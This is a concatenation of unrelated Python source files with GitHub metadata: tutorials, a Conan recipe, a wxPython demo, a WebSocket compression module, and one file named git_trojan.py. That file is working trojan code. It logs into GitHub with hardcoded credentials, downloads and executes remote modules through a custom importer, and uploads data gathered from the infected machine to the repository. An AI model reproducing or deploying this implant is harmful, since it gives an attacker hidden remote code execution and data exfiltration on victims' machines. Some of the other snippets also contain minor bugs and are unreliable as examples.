1d2e8da3aa4aa845dfd246adf1fb16568c6e21fe
/bakery/venv/bin/pip2
b35d65ae05505ed7d6725acf4252ae497a18b037
[]
no_license
stanislaw-rzewuski/REST-automation-demo
732e5fb846c8ae1d0ba9b5ca0462f96fc33828ef
00842d798c211f5eec11fd2dc9642d6cc0ac7a97
refs/heads/master
2020-07-02T13:32:17.956593
2019-09-01T23:45:26
2019-09-01T23:45:26
201,534,799
0
0
null
null
null
null
UTF-8
Python
false
false
262
#!/home/stan/repos/REST-automation-demo/bakery/venv/bin/python2.7 # -*- coding: utf-8 -*- import re import sys from pip._internal import main if __name__ == '__main__': sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0]) sys.exit(main())
[ "stanislaw.rzewuski@gmail.com" ]
stanislaw.rzewuski@gmail.com
b83067167ec0f4fa218892d23cdf72fb3e4791d4
bf92c350a1799ac463bad046e8eea3271aeb7b15
/3ds/tests/screen-metrics.py
2ffeb6e74a166976529130f118d5f1990d13fa5c
[ "MIT" ]
permissive
ObsidianX/3ds_monty
72065dbdfe9890c1a02bb0988aa0a5dd591a8cc6
8dc10ca4874175dffcb9c95d1e294c74f3c47ee2
refs/heads/master
2021-09-24T18:12:10.556030
2021-09-18T10:32:51
2021-09-18T10:32:51
56,961,916
20
6
MIT
2021-09-18T10:32:52
2016-04-24T08:30:45
C
UTF-8
Python
false
false
742
py
from citrus import * import sf2d gfx.init_default() top = console.PrintConsole(gfx.SCREEN_TOP, window=(2, 2, 46, 26)) metrics = { "top_width": sf2d.screen['top']['width'], "top_height": sf2d.screen['top']['height'], "bot_width": sf2d.screen['bottom']['width'], "bot_height": sf2d.screen['bottom']['height'] } print("""Screen metrics: Top screen: width = %(top_width)s height = %(top_height)s Bottom screen: width = %(bot_width)s height = %(bot_height)s""" % metrics) top.set_position(13, 25) print('Press Start to exit') while apt.main_loop(): hid.scan_input() if hid.keys_down() & hid.KEY_START: break gfx.flush_buffers() gfx.swap_buffers() gsp.wait_for_vblank() gfx.exit()
[ "obsidianx@gmail.com" ]
obsidianx@gmail.com
7570d43bec14a9efea7e4ecd9455860a4ec6ea78
3666c88c1bb764e3d98bbfd56205c8b988a254f1
/ALDS1_9_D.py
f4e5af35a7d7b51efe204e2705e5f166427ace50
[]
no_license
shi-mo/aoj
538b97e7d56136df0197ad015cc85c5aa9501ca5
b058e77a53163a0ada1425d3966b45b2619e275c
refs/heads/master
2023-04-02T18:33:43.783422
2023-03-20T12:20:37
2023-03-20T12:20:37
6,807,323
0
0
null
null
null
null
UTF-8
Python
false
false
429
py
def unshift(a, i): while 1 < i: tmp = a[i] a[i] = a[i//2] a[i//2] = tmp i = i//2 def reverse_heap_sort(a): n = len(a) a = [None] + a hsize = 1 while hsize < n: unshift(a, hsize) hsize += 1 tmp = a[1] a[1] = a[hsize] a[hsize] = tmp return a[1:] _ = input() a = [int(x) for x in input().split()] print(*reverse_heap_sort(sorted(a)))
[ "yoshifumi.shimono@gmail.com" ]
yoshifumi.shimono@gmail.com
52c940283704d2f43f630be09f5c5b68923fc333
7032fd0d1652cc1bec1bff053af4f486a5704cd5
/old/OpenExrId_1.0-beta.17/conanfile.py
dcb74bafee3fb8349547a73fae2331e0d04f1a9f
[]
no_license
MercenariesEngineering/conan_recipes
c8f11ddb3bd3eee048dfd476cdba1ef84b85af5e
514007facbd1777799d17d041fc34dffef61eff8
refs/heads/master
2023-07-09T08:10:35.941112
2023-04-19T13:36:38
2023-04-19T13:36:38
169,575,224
7
1
null
2023-04-19T14:11:35
2019-02-07T13:23:02
C++
UTF-8
Python
false
false
2,256
py
from conans import ConanFile, CMake, tools import os, shutil #conan remote add conan-transit https://api.bintray.com/conan/conan/conan-transit #conan remote add hulud https://api.bintray.com/conan/hulud/libs #conan remote add pierousseau https://api.bintray.com/conan/pierousseau/libs class OpenEXRIdConan(ConanFile): name = "OpenExrId" version = "1.0-beta.17" license = "MIT" url = "https://github.com/MercenariesEngineering/openexrid" description = "OpenEXR files able to isolate any object of a CG image with a perfect antialiazing " settings = "os", "compiler", "build_type", "arch" options = {"shared": [True, False], "fPIC": [True, False] } default_options = "shared=False","*:shared=False","fPIC=True" generators = "cmake" def requirements(self): # From our recipes : self.requires("zlib/1.2.11@pierousseau/stable") self.requires("IlmBase/2.2.0@pierousseau/stable") self.requires("OpenEXR/2.2.0@pierousseau/stable") self.requires("re2/2019-06-01@pierousseau/stable") self.requires("OpenImageIO/1.6.18@pierousseau/stable") def configure(self): if self.settings.os == "Linux": # fPIC option exists only on linux self.options["boost"].fPIC=True self.options["IlmBase"].fPIC=True self.options["OpenEXR"].fPIC=True self.options["OpenImageIO"].fPIC=True self.options["re2"].fPIC=True self.options["zlib"].fPIC=True def source(self): self.run("git clone http://github.com/MercenariesEngineering/openexrid.git --branch %s" % self.version) def build(self): cmake = CMake(self) #cmake.verbose = True cmake.definitions["USE_CONAN"] = True cmake.definitions["BUILD_LIB"] = True cmake.definitions["BUILD_PLUGINS"] = False cmake.configure(source_dir="%s/openexrid" % self.source_folder) cmake.build() def package(self): self.copy("*.h", dst="include/openexrid", src="openexrid/openexrid") self.copy("*.lib", dst="lib", keep_path=False) self.copy("*.a", dst="lib", keep_path=False) def package_info(self): self.cpp_info.libs = tools.collect_libs(self)
[ "rousseau@mercenaries-engineering.com" ]
rousseau@mercenaries-engineering.com
73720836ac4d19c75a01a8faa535d62cefe97bf7
58399ec14cef82b023fb9eb83188cd3f4f5f8c20
/timeexample.py
8247868e85c8c924d2d8e0e61bab5da117fab710
[]
no_license
Venky9791/Venky_Geekexample
0baf4262c05cfa1db4e2b2dfa57f05a2297b11da
02d0389949d7add55a115ee9c02e064688706a9e
refs/heads/master
2020-06-26T19:08:01.335717
2019-08-04T22:22:45
2019-08-04T22:22:45
199,725,955
0
0
null
null
null
null
UTF-8
Python
false
false
665
py
import time from time import perf_counter as mytimer import random import tkinter print (tkinter.TkVersion) print (tkinter.TclVersion) mainwindow = tkinter.Tk() mainwindow.title = "My First Example GUI" mainwindow.geometry('640*640+8+400') mainwindow.mainloop() # input("Press enter to Start the timeer") # waittime= random.randint(1,6) # time.sleep(waittime) # starttime = mytimer() # endtime= input ("Press Enter to Stop the timer") # endtime=mytimer() # # # print("Started at"+time.strftime("%X",time.localtime(starttime))) # print("Ended at"+time.strftime("%X",time.localtime(endtime))) # print ("Your Reaction time is {} seconds" .format(endtime-starttime))
[ "bharthivenky76@gmail.com" ]
bharthivenky76@gmail.com
3cfa851500fb84c304d21eae3159205368643a00
d54afd55df19afffa98dd767b812f24d204e9d1b
/Querying SQLite from Python-256.py
6d038843eb0505f231aed39453320b21ab9c8ce2
[]
no_license
nemkothari/Sql-Fundamentals
b7666a8ff64525a8cb02afccede2aa47178c7eb3
99bc7be798bbe88eef2af12eea5a9851d9e38914
refs/heads/master
2020-04-10T15:39:40.572504
2018-12-10T04:39:59
2018-12-10T04:39:59
161,117,632
0
0
null
null
null
null
UTF-8
Python
false
false
805
py
## 3. Connecting to the Database ## import sqlite3 conn = sqlite3.connect('jobs.db') ## 6. Creating a Cursor and Running a Query ## import sqlite3 conn = sqlite3.connect("jobs.db") cursor = conn.cursor() query = "select Major from recent_grads;" cursor.execute(query) majors = cursor.fetchall() print(majors[0:2]) ## 8. Fetching a Specific Number of Results ## import sqlite3 conn = sqlite3.connect("jobs.db") qry =" select Major , Major_category from recent_grads" five_results=conn.execute(qry).fetchmany(5) ## 9. Closing the Database Connection ## conn = sqlite3.connect("jobs.db") conn.close() ## 10. Practice ## import sqlite3 con = sqlite3.connect("jobs2.db") qrt= 'select Major from recent_grads order by Major desc' reverse_alphabetical = conn.execute(qrt).fetchall() con.close()
[ "noreply@github.com" ]
noreply@github.com
74d21d6d9cafd0126d88ab224385192c6153a0aa
15e820be4636b1f95c962ed5d63d52d4abacc8dc
/Tutorial/Flask/4_CameraStreaming/camera.py
4aba9a540cb41e882da9d45986107c480c032966
[]
no_license
hashimotodaisuke/PlantFactoryTutorial
c2accab8c9fc6e618b2b10d475f5867db3a4996d
cb1dfb99929a44d97c251fa3682890e815372b3d
refs/heads/master
2023-05-31T01:28:31.963952
2021-07-05T00:19:13
2021-07-05T00:19:13
null
0
0
null
null
null
null
UTF-8
Python
false
false
1,191
py
import cv2 class VideoCamera(object): def __init__(self): self.video = cv2.VideoCapture(0) # Opencvのカメラをセットします。(0)はノートパソコンならば組み込まれているカメラ def __del__(self): self.video.release() def get_frame(self): # read()は、二つの値を返すので、success, imageの2つ変数で受けています。 # OpencVはデフォルトでは raw imagesなので JPEGに変換 # ファイルに保存する場合はimwriteを使用、メモリ上に格納したい時はimencodeを使用 # cv2.imencode() は numpy.ndarray() を返すので .tobytes() で bytes 型に変換 success, image = self.video.read() if success == True: ret, jpeg = cv2.imencode('.jpg', image) # self.video.read fail時何も返さないと復帰しないため静止画を返す # ちなみにfailになるのは複数のブラウザから表示した時 else: image = cv2.imread('/home/pi/Picture/raspi.png', cv2.IMREAD_GRAYSCALE) ret, jpeg = cv2.imencode('.jpg', image) return jpeg.tobytes()
[ "hashi.uniden@gmail.com" ]
hashi.uniden@gmail.com
067f9f37e818e5bb7b065854d145ba1f603166aa
9680c83911441f9e796a8c87a38f060756911552
/git_trojan.py
4eb5f066268b109f3909c0c1962f4a578339fd7d
[]
no_license
qk13warcraft/chapter7
bdf69b5ecd47ff7888e87a3ec9026fa6291a41f4
e1300162725b1b61b530bfaf7bafa534da04f564
refs/heads/master
2021-01-21T21:04:58.298208
2017-05-25T14:54:55
2017-05-25T14:54:55
92,299,812
0
0
null
null
null
null
UTF-8
Python
false
false
3,610
py
# -*- coding: utf-8 -*- import json import base64 import sys import time import imp import random import threading import Queue import os from github3 import login """ 木马主体框架,从GitHub上下载配置选项和运行的模块代码 ttp://github3py.readthedocs.io/en/master/repos.html#github3.repos.branch.Branch """ trojan_id = "abc" #唯一标识了木马文件 trojan_config = "%s.json" %trojan_id data_path = "data/%s/" %trojan_id trojan_modules = [] configured = False task_queue = Queue.Queue() def connect_to_github(): """ 连接github,对用户进行认证,获取当前的repo和branch的对象提供给其他函数使用 """ gh = login(username="qk13warcraft",password = "qk14warcraft") repo = gh.repository("qk13warcraft","chapter7") branch = repo.branch("master") return gh,repo,branch def get_file_contents(filepath): """ 从远程的repo中抓取文件,将文件内容读取到本地变量中 """ gh,repo,branch = connect_to_github() tree = branch.commit.commit.tree.recurse() for filename in tree.tree: if filepath in filename.path: print "[*] Found file %s" %filepath blob = repo.blob(filename._json_data['sha']) return blob.content return None def get_trojan_config(): """ 获得repo中的远程配置文件,木马解析其中的内容获得需要运行的模块名称 """ global configured config_json = get_file_contents(trojan_config) config = json.loads(base64.b64decode(config_json)) configured = True for task in config: if task['module'] not in sys.modules: exec("import %s" %task['module']) return config def store_module_result(data): """ 将从目标机器上手机的数据推送到repo中 """ gh,repo,branch = connect_to_github() remote_path = "data/%s/%d.data" %(trojan_id,random.randint(1000,100000)) repo.create_file(remote_path,"Commit message",base64.b64encode(data)) return class GitImporter(object): """ 当python解释器加载不存在的模块时,该类就会被调用 """ def __init__(self): self.current_module_code = "" def find_module(self,fullname,path=None): """ 尝试获取模块所在的位置 """ if configured: print "[*] Attempting to retrieve %s" %fullname new_library = get_file_contents("modules/%s" %fullname) #如果能定位到所需的模块文件,则对其中的内容进行解密并将结果保存到该类中 #通过返回self变量,告诉python解释器找到了所需的模块 if new_library is not None: self.current_module_code = 
base64.b64decode(new_library) return self return None def load_module(self,name): """ 完成模块的实际加载过程,先利用本地的imp模块创建一个空的模块对象,然后将GitHub中获得的代码导入到 这个对象中,最后,将这个新建的模块添加到sys.modules列表中,这样在之后的代码中就可以 import 方法 调用这个模块了 """ module = imp.new_module(name) exec self.current_module_code in module.__dict__ sys.modules[name] = module return module def module_runner(module): task_queue.put(1) result = sysy.modules[module].run() task_queue.get() #保存结果到我们的repo中 store_module_result(result) return #木马的主循环 sys.meta_path = [GitImporter()] while True: if task_queue.empty(): config = get_trojan_config() for task in config: t = threading.Thread(target=module_runner,args=(task['module'],)) t.start() time.sleep(random.randint(1,10)) time.sleep(random.randint(1000,10000))
[ "qk13warcraft@163.com" ]
qk13warcraft@163.com
942d5f383fb074463bde66060a1faedb97568626
1033c93917117f462771571c29dd046954582bd8
/revscores/features/proportion_of_symbolic_added.py
2eeae56295eca238e2c206c786853e46201b8d7b
[ "MIT" ]
permissive
jonasagx/Revision-Scoring
d4e3e892ac5de3a7f3032ef2b4fcc7b6efb20330
dfacba014e30d49577aa1a56aab13393ecede9d5
refs/heads/master
2021-01-17T11:57:39.393734
2015-01-10T19:13:02
2015-01-10T19:13:02
29,064,762
0
1
null
2015-01-10T19:13:03
2015-01-10T17:25:22
Python
UTF-8
Python
false
false
501
py
from .chars_added import chars_added from .feature import Feature from .symbolic_chars_added import symbolic_chars_added def process(chars_added, symbolic_chars_added): return symbolic_chars_added/(chars_added or 1) proportion_of_symbolic_added = Feature("proportion_of_symbolic_added", process, returns=float, depends_on=[chars_added, symbolic_chars_added])
[ "aaron.halfaker@gmail.com" ]
aaron.halfaker@gmail.com
c7741bf2134b8580c0fa764a5a86ef149790da35
1e39e416db368a47c2cfe5eadf797abe2bf3ad4a
/model.py
e70d5dcc2dc4fda4425423d78f294e093224f0f4
[]
no_license
r00t4/dog
5846ddf52e0fda1ab30c4c7a027f87f1339f8d48
1c99dcd08d9610609efa4e558d4b2e4737e32de2
refs/heads/master
2020-09-09T15:19:35.323134
2019-11-13T13:56:28
2019-11-13T13:56:28
221,471,170
0
0
null
null
null
null
UTF-8
Python
false
false
1,198
py
import torch import torch.nn as nn import torch.nn.functional as F class NeuralNetwork(nn.Module): def __init__(self): super(NeuralNetwork, self).__init__() self.conv1 = nn.Conv2d(3, 16, 3, padding=1) self.conv2 = nn.Conv2d(16, 32, 3, padding=1) self.conv3 = nn.Conv2d(32, 64, 3, padding=1) self.conv4 = nn.Conv2d(64, 128, 3, padding=1) self.conv5 = nn.Conv2d(128, 256, 3) self.fc1 = nn.Linear(256*12*12, 4096) self.fc2 = nn.Linear(4096, 1024) self.fc3 = nn.Linear(1024, 120) def forward(self, input): x = self.conv1(input) x = F.relu(x) x = F.max_pool2d(x, 2) x = self.conv2(x) x = F.relu(x) x = F.max_pool2d(x, 2) x = self.conv3(x) x = F.relu(x) x = F.max_pool2d(x, 2) x = self.conv4(x) x = F.relu(x) x = F.max_pool2d(x, 2) x = self.conv5(x) x = F.relu(x) # print(x.shape) x = x.view(-1, 256*12*12) # print(len(x)) x = self.fc1(x) x = F.relu(x) x = self.fc2(x) x = F.relu(x) out = self.fc3(x) return out
[ "kborash@dar.kz" ]
kborash@dar.kz
fe3c331699a0e001fa186a6177c1df7612b048b4
0b64d153144478bc87c8e187c54de2faeb660641
/env/Lib/site-packages/autobahn/websocket/compress_snappy.py
cee3d60ccdb0ca60fe4d33a7ec7db60622e4bcb3
[ "LicenseRef-scancode-free-unknown", "LicenseRef-scancode-other-copyleft", "GPL-1.0-or-later", "bzip2-1.0.6", "LicenseRef-scancode-warranty-disclaimer", "LicenseRef-scancode-proprietary-license", "LicenseRef-scancode-newlib-historical", "OpenSSL", "Python-2.0", "TCL", "LicenseRef-scancode-python-cwi", "MIT" ]
permissive
YUND4/smartlights
db4d102fd983db355941431553818f243ffd682f
a86d5e68b4e3c72b133a6853ebd4a1ed0f2623d4
refs/heads/master
2022-12-24T11:38:06.669241
2019-07-12T16:55:01
2019-07-12T16:55:01
196,614,236
0
1
MIT
2022-12-11T22:42:03
2019-07-12T16:52:16
HTML
UTF-8
Python
false
false
16,978
py
############################################################################### # # The MIT License (MIT) # # Copyright (c) Crossbar.io Technologies GmbH # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE. # ############################################################################### from __future__ import absolute_import import snappy from autobahn.websocket.compress_base import PerMessageCompressOffer, \ PerMessageCompressOfferAccept, \ PerMessageCompressResponse, \ PerMessageCompressResponseAccept, \ PerMessageCompress __all__ = ( 'PerMessageSnappyMixin', 'PerMessageSnappyOffer', 'PerMessageSnappyOfferAccept', 'PerMessageSnappyResponse', 'PerMessageSnappyResponseAccept', 'PerMessageSnappy', ) class PerMessageSnappyMixin(object): """ Mixin class for this extension. """ EXTENSION_NAME = "permessage-snappy" """ Name of this WebSocket extension. 
""" class PerMessageSnappyOffer(PerMessageCompressOffer, PerMessageSnappyMixin): """ Set of extension parameters for `permessage-snappy` WebSocket extension offered by a client to a server. """ @classmethod def parse(cls, params): """ Parses a WebSocket extension offer for `permessage-snappy` provided by a client to a server. :param params: Output from :func:`autobahn.websocket.WebSocketProtocol._parseExtensionsHeader`. :type params: list :returns: A new instance of :class:`autobahn.compress.PerMessageSnappyOffer`. :rtype: obj """ # extension parameter defaults accept_no_context_takeover = False request_no_context_takeover = False # verify/parse client ("client-to-server direction") parameters of permessage-snappy offer for p in params: if len(params[p]) > 1: raise Exception("multiple occurrence of extension parameter '%s' for extension '%s'" % (p, cls.EXTENSION_NAME)) val = params[p][0] if p == 'client_no_context_takeover': # noinspection PySimplifyBooleanCheck if val is not True: raise Exception("illegal extension parameter value '%s' for parameter '%s' of extension '%s'" % (val, p, cls.EXTENSION_NAME)) else: accept_no_context_takeover = True elif p == 'server_no_context_takeover': # noinspection PySimplifyBooleanCheck if val is not True: raise Exception("illegal extension parameter value '%s' for parameter '%s' of extension '%s'" % (val, p, cls.EXTENSION_NAME)) else: request_no_context_takeover = True else: raise Exception("illegal extension parameter '%s' for extension '%s'" % (p, cls.EXTENSION_NAME)) offer = cls(accept_no_context_takeover, request_no_context_takeover) return offer def __init__(self, accept_no_context_takeover=True, request_no_context_takeover=False): """ :param accept_no_context_takeover: Iff true, client accepts "no context takeover" feature. :type accept_no_context_takeover: bool :param request_no_context_takeover: Iff true, client request "no context takeover" feature. 
:type request_no_context_takeover: bool """ if type(accept_no_context_takeover) != bool: raise Exception("invalid type %s for accept_no_context_takeover" % type(accept_no_context_takeover)) self.accept_no_context_takeover = accept_no_context_takeover if type(request_no_context_takeover) != bool: raise Exception("invalid type %s for request_no_context_takeover" % type(request_no_context_takeover)) self.request_no_context_takeover = request_no_context_takeover def get_extension_string(self): """ Returns the WebSocket extension configuration string as sent to the server. :returns: PMCE configuration string. :rtype: str """ pmce_string = self.EXTENSION_NAME if self.accept_no_context_takeover: pmce_string += "; client_no_context_takeover" if self.request_no_context_takeover: pmce_string += "; server_no_context_takeover" return pmce_string def __json__(self): """ Returns a JSON serializable object representation. :returns: JSON serializable representation. :rtype: dict """ return {'extension': self.EXTENSION_NAME, 'accept_no_context_takeover': self.accept_no_context_takeover, 'request_no_context_takeover': self.request_no_context_takeover} def __repr__(self): """ Returns Python object representation that can be eval'ed to reconstruct the object. :returns: Python string representation. :rtype: str """ return "PerMessageSnappyOffer(accept_no_context_takeover = %s, request_no_context_takeover = %s)" % (self.accept_no_context_takeover, self.request_no_context_takeover) class PerMessageSnappyOfferAccept(PerMessageCompressOfferAccept, PerMessageSnappyMixin): """ Set of parameters with which to accept an `permessage-snappy` offer from a client by a server. """ def __init__(self, offer, request_no_context_takeover=False, no_context_takeover=None): """ :param offer: The offer being accepted. :type offer: Instance of :class:`autobahn.compress.PerMessageSnappyOffer`. :param request_no_context_takeover: Iff true, server request "no context takeover" feature. 
:type request_no_context_takeover: bool :param no_context_takeover: Override server ("server-to-client direction") context takeover (this must be compatible with offer). :type no_context_takeover: bool """ if not isinstance(offer, PerMessageSnappyOffer): raise Exception("invalid type %s for offer" % type(offer)) self.offer = offer if type(request_no_context_takeover) != bool: raise Exception("invalid type %s for request_no_context_takeover" % type(request_no_context_takeover)) if request_no_context_takeover and not offer.accept_no_context_takeover: raise Exception("invalid value %s for request_no_context_takeover - feature unsupported by client" % request_no_context_takeover) self.request_no_context_takeover = request_no_context_takeover if no_context_takeover is not None: if type(no_context_takeover) != bool: raise Exception("invalid type %s for no_context_takeover" % type(no_context_takeover)) if offer.request_no_context_takeover and not no_context_takeover: raise Exception("invalid value %s for no_context_takeover - client requested feature" % no_context_takeover) self.no_context_takeover = no_context_takeover def get_extension_string(self): """ Returns the WebSocket extension configuration string as sent to the server. :returns: PMCE configuration string. :rtype: str """ pmce_string = self.EXTENSION_NAME if self.offer.request_no_context_takeover: pmce_string += "; server_no_context_takeover" if self.request_no_context_takeover: pmce_string += "; client_no_context_takeover" return pmce_string def __json__(self): """ Returns a JSON serializable object representation. :returns: JSON serializable representation. :rtype: dict """ return {'extension': self.EXTENSION_NAME, 'offer': self.offer.__json__(), 'request_no_context_takeover': self.request_no_context_takeover, 'no_context_takeover': self.no_context_takeover} def __repr__(self): """ Returns Python object representation that can be eval'ed to reconstruct the object. :returns: Python string representation. 
:rtype: str """ return "PerMessageSnappyAccept(offer = %s, request_no_context_takeover = %s, no_context_takeover = %s)" % (self.offer.__repr__(), self.request_no_context_takeover, self.no_context_takeover) class PerMessageSnappyResponse(PerMessageCompressResponse, PerMessageSnappyMixin): """ Set of parameters for `permessage-snappy` responded by server. """ @classmethod def parse(cls, params): """ Parses a WebSocket extension response for `permessage-snappy` provided by a server to a client. :param params: Output from :func:`autobahn.websocket.WebSocketProtocol._parseExtensionsHeader`. :type params: list :returns: A new instance of :class:`autobahn.compress.PerMessageSnappyResponse`. :rtype: obj """ client_no_context_takeover = False server_no_context_takeover = False for p in params: if len(params[p]) > 1: raise Exception("multiple occurrence of extension parameter '%s' for extension '%s'" % (p, cls.EXTENSION_NAME)) val = params[p][0] if p == 'client_no_context_takeover': # noinspection PySimplifyBooleanCheck if val is not True: raise Exception("illegal extension parameter value '%s' for parameter '%s' of extension '%s'" % (val, p, cls.EXTENSION_NAME)) else: client_no_context_takeover = True elif p == 'server_no_context_takeover': # noinspection PySimplifyBooleanCheck if val is not True: raise Exception("illegal extension parameter value '%s' for parameter '%s' of extension '%s'" % (val, p, cls.EXTENSION_NAME)) else: server_no_context_takeover = True else: raise Exception("illegal extension parameter '%s' for extension '%s'" % (p, cls.EXTENSION_NAME)) response = cls(client_no_context_takeover, server_no_context_takeover) return response def __init__(self, client_no_context_takeover, server_no_context_takeover): self.client_no_context_takeover = client_no_context_takeover self.server_no_context_takeover = server_no_context_takeover def __json__(self): """ Returns a JSON serializable object representation. :returns: JSON serializable representation. 
:rtype: dict """ return {'extension': self.EXTENSION_NAME, 'client_no_context_takeover': self.client_no_context_takeover, 'server_no_context_takeover': self.server_no_context_takeover} def __repr__(self): """ Returns Python object representation that can be eval'ed to reconstruct the object. :returns: Python string representation. :rtype: str """ return "PerMessageSnappyResponse(client_no_context_takeover = %s, server_no_context_takeover = %s)" % (self.client_no_context_takeover, self.server_no_context_takeover) class PerMessageSnappyResponseAccept(PerMessageCompressResponseAccept, PerMessageSnappyMixin): """ Set of parameters with which to accept an `permessage-snappy` response from a server by a client. """ def __init__(self, response, no_context_takeover=None): """ :param response: The response being accepted. :type response: Instance of :class:`autobahn.compress.PerMessageSnappyResponse`. :param no_context_takeover: Override client ("client-to-server direction") context takeover (this must be compatible with response). :type no_context_takeover: bool """ if not isinstance(response, PerMessageSnappyResponse): raise Exception("invalid type %s for response" % type(response)) self.response = response if no_context_takeover is not None: if type(no_context_takeover) != bool: raise Exception("invalid type %s for no_context_takeover" % type(no_context_takeover)) if response.client_no_context_takeover and not no_context_takeover: raise Exception("invalid value %s for no_context_takeover - server requested feature" % no_context_takeover) self.no_context_takeover = no_context_takeover def __json__(self): """ Returns a JSON serializable object representation. :returns: JSON serializable representation. :rtype: dict """ return {'extension': self.EXTENSION_NAME, 'response': self.response.__json__(), 'no_context_takeover': self.no_context_takeover} def __repr__(self): """ Returns Python object representation that can be eval'ed to reconstruct the object. 
:returns: Python string representation. :rtype: str """ return "PerMessageSnappyResponseAccept(response = %s, no_context_takeover = %s)" % (self.response.__repr__(), self.no_context_takeover) class PerMessageSnappy(PerMessageCompress, PerMessageSnappyMixin): """ `permessage-snappy` WebSocket extension processor. """ @classmethod def create_from_response_accept(cls, is_server, accept): pmce = cls(is_server, accept.response.server_no_context_takeover, accept.no_context_takeover if accept.no_context_takeover is not None else accept.response.client_no_context_takeover) return pmce @classmethod def create_from_offer_accept(cls, is_server, accept): pmce = cls(is_server, accept.no_context_takeover if accept.no_context_takeover is not None else accept.offer.request_no_context_takeover, accept.request_no_context_takeover) return pmce def __init__(self, is_server, server_no_context_takeover, client_no_context_takeover): self._is_server = is_server self.server_no_context_takeover = server_no_context_takeover self.client_no_context_takeover = client_no_context_takeover self._compressor = None self._decompressor = None def __json__(self): return {'extension': self.EXTENSION_NAME, 'server_no_context_takeover': self.server_no_context_takeover, 'client_no_context_takeover': self.client_no_context_takeover} def __repr__(self): return "PerMessageSnappy(is_server = %s, server_no_context_takeover = %s, client_no_context_takeover = %s)" % (self._is_server, self.server_no_context_takeover, self.client_no_context_takeover) def start_compress_message(self): if self._is_server: if self._compressor is None or self.server_no_context_takeover: self._compressor = snappy.StreamCompressor() else: if self._compressor is None or self.client_no_context_takeover: self._compressor = snappy.StreamCompressor() def compress_message_data(self, data): return self._compressor.add_chunk(data) def end_compress_message(self): return "" def start_decompress_message(self): if self._is_server: if 
self._decompressor is None or self.client_no_context_takeover: self._decompressor = snappy.StreamDecompressor() else: if self._decompressor is None or self.server_no_context_takeover: self._decompressor = snappy.StreamDecompressor() def decompress_message_data(self, data): return self._decompressor.decompress(data) def end_decompress_message(self): pass
[ "syundarivera@gmail.com" ]
syundarivera@gmail.com
987986c93691efd140bd8faaf1832769a486b00e
0116525d908fd3a604dfe6a4da4ffc455d5f7d40
/arraymin.py
963aa15c0df1484c57d06914d65f53f3e30a5e6d
[]
no_license
Krithikasri/set3beginner
c9a18cf20087b72a5aab27c6ba7427a4e05bfb64
2d6269605a48905923d428e1717575759dd5a6ad
refs/heads/master
2020-04-22T03:27:12.009941
2019-02-14T05:48:26
2019-02-14T05:48:26
170,087,158
0
0
null
null
null
null
UTF-8
Python
false
false
62
py
N=int(input()) k=list(map(int,input().split())) print(min(k))
[ "noreply@github.com" ]
noreply@github.com
76f4330d8dd21990e81c8fffc080ff973d8ca274
fbb2ff6d6734e02b24d9eef2a16ebba58c755a1b
/wx_event_propagate.py
bb82371c56ce8e78e08839ab3bdfb4977fd6db15
[]
no_license
brainliubo/wxpython_project
a29fe18eb14c20bc1c348c724460d17d7967dee9
98edc15be6c16b7e413027231b4a512bd37343ee
refs/heads/master
2020-03-24T21:06:09.994644
2019-01-02T11:47:08
2019-01-02T11:47:08
143,013,605
0
0
null
null
null
null
UTF-8
Python
false
false
2,261
py
''' event.Skip() 方法是将event 继续往上一级进行传递的重要方法,如果不调用,则该event只要被catch 一次,就不进行传递了 ''' import wx ID_BUTTON1 = wx.NewId() # 生成2个ID ID_BUTTON2 = wx.NewId() class MyApp(wx.App): def OnInit(self): #app 上添加frame self.frame = MyFrame(None, title="Event Propagation") self.SetTopWindow(self.frame) self.frame.Show() self.Bind(wx.EVT_BUTTON, self.OnButtonApp) return True def OnButtonApp(self, event): event_id = event.GetId() if event_id == ID_BUTTON1 : print ("BUTTON ONE Event reached the App Object") class MyFrame(wx.Frame): def __init__(self, parent, id=wx.ID_ANY, title="event propagate frame",pos=wx.DefaultPosition, size=wx.DefaultSize,style=wx.DEFAULT_FRAME_STYLE,name="MyFrame"): super(MyFrame, self).__init__(parent, id, title,pos, size, style, name) self.panel = MyPanel(self) self.btn1 = wx.Button(self.panel, ID_BUTTON1,"Propagates") self.btn2 = wx.Button(self.panel, ID_BUTTON2, "Doesn't Propagate") sizer = wx.BoxSizer(wx.HORIZONTAL) sizer.Add(self.btn1, 0, wx.ALL, 10) sizer.Add(self.btn2, 0, wx.ALL, 10) self.panel.SetSizer(sizer) self.Bind(wx.EVT_BUTTON, self.OnButtonFrame) def OnButtonFrame(self, event): event_id = event.GetId() if event_id == ID_BUTTON1: print("BUTTON ONE event reached the Frame") event.Skip() elif event_id == ID_BUTTON2: print ("BUTTON TWO event reached the Frame") event.Skip() class MyPanel(wx.Panel): def __init__(self, parent): super(MyPanel, self).__init__(parent) self.Bind(wx.EVT_BUTTON, self.OnPanelButton) def OnPanelButton(self, event): event_id = event.GetId() if event_id == ID_BUTTON1: print ("BUTTON ONE event reached the Panel") event.Skip() elif event_id == ID_BUTTON2: print ("BUTTON TWO event reached the Panel") event.Skip() # Not skipping the event will cause its # propagation to end here if __name__ == "__main__": app = MyApp(False) app.MainLoop()
[ "clairlb@163.com" ]
clairlb@163.com
220274ef4a9b4c4918eadc9760519ac1b39963d8
3cd18a3e789d3a0739768f1ae848d9f74b9dbbe7
/mounth001/day21/exercise03.py
fe9a7a38bb1bfcf3fe7454d21909dc564595ee5d
[]
no_license
Molly-l/66
4bfe2f93e726d3cc059222c93a2bb3460b21ad78
fae24a968f590060522d30f1b278fcfcdab8b36f
refs/heads/master
2020-09-28T12:50:18.590794
2019-11-27T04:42:28
